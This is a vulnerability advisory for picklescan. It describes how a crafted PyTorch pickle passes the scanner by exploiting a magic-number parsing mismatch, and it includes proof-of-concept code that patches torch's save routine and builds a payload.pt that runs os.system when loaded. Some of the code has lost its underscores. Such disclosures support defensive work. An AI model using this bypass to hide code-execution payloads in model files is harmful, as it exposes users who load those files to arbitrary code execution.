PT-2026-22492 · Pypi · Picklescan
Published
2026-02-18
·
Updated
2026-02-18
CVSS v4.0
7.1
High
| Vector | AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N |
Summary
This is a scanning bypass to
scan pytorch function in picklescan. As we can see in the implementation of get magic number() that uses pickletools.genops(data) to get the magic number with the condition opcode.name includes INT or LONG, but the PyTorch's implemtation simply uses pickle module.load() to get this magic number. For this implementation difference, we then can embed the magic code into the PyTorch file via dynamic eval on the reduce trick, which can make the pickletools.genops(data) cannot get the magic code in INT or LONG type, but the pickle module.load() can still return the same magic code, eading to a bypass.PoC
Attack Step 1
we can edit the source code of the function legacy save() as follows:
Python
class payload:
def reduce (self):
return (eval, ('MAGIC NUMBER',))
pickle module.dump(payload(), f, protocol=pickle protocol)Attack Step 2
with the modified version of
PyTorch, we run the following PoC to generate the payload.pt:Python
import torch
class payload:
def reduce (self):
return ( import ('os').system, ('touch /tmp/hacked',))
torch.save(payload(), './payload.pt', use new zipfile serialization = False)Picklescan result
ERROR: Invalid magic number for file /home/pzhou/bug-bunty/pytorch/PoC/payload.pt: None != 119547037146038801333356
----------- SCAN SUMMARY -----------
Scanned files: 0
Infected files: 0
Dangerous globals: 0Victim Step
Python
import torch
torch.load('./payload.pt', weights only=False)then you can find the illegal file
/tmp/hacked created in your local system.Impact
Craft malicious
PyTorch payloads to bypass picklescan, then recall ACE/RCE.Fix
Incomplete List of Disallowed Inputs
Found an issue in the description? Have something to add? Feel free to write us 👾
Weakness Enumeration
Related Identifiers
Affected Products
Picklescan